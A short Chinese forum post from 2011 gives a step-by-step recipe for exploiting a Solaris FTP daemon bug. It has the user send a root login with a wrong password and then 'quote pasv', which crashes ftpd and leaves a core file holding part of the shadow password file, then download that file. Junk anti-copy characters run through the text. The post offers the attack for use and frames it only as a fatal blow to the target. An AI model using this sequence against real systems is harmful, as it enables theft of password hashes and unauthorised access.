该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:6 z1 L) G e9 [$ r
9 K* O/ Q' Y! H: G, z0 s* r& p
1.通过 ftp 正常登录到目的主机上
4 ^: l0 S3 q( W* ^) d$ Y# P: A! ]( @+ J# S0 z
2.输入如下命令序列:& |/ k# P# a# s' q( a( R; m* F
$ }6 ]# X. A1 r' fftp> user root wrongpasswd c. F& x' h; [1 B# \4 G( X( a! i1 A
8 L$ F! g* W8 J3 L* A/ B
ftp> quote pasv
6 X6 R7 K" q) ?% z3 T; m) Q( [# K$ r
9 g `# C+ @& v) e3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
% l Z( c `- m: X/ q, W& G/ W; ~6 d1 J( V
4.再次进入FTP >get core5 M) e# V w: e- y( x3 z3 j+ S4 O0 i
' C: \6 i0 n( _* r2 S) B; i补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了) f# y6 w/ K2 _3 F7 E6 J# @
4 j3 a9 e# m u p0 u U1 @8 D. i |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡